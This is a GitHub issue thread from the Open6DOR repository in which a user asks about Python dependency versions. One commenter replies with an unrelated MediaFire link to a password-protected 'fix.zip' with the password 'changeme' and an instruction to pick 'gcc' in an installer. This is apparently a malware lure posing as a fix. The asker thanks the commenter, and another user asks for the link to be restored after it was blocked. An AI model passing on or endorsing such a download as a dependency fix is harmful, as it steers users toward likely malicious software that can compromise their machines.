### ISSUE TITLE
python package dependency

### ISSUE THREAD

**Issue by pengxia24** [Selina2023/Open6DOR#2]
hi.

1. Are all python dependencies in the requierment file?

2. What are the dependency versions in requirement file?

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pengxia24** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

Thank you very much for you prompt reply

**Comment by liuzhi136** [comment]
@Selina2023 
![image](https://github.com/user-attachments/assets/72285ebe-2ddd-41d7-bb7b-a94080c97bac)
It's blocked now. Can we access it again?
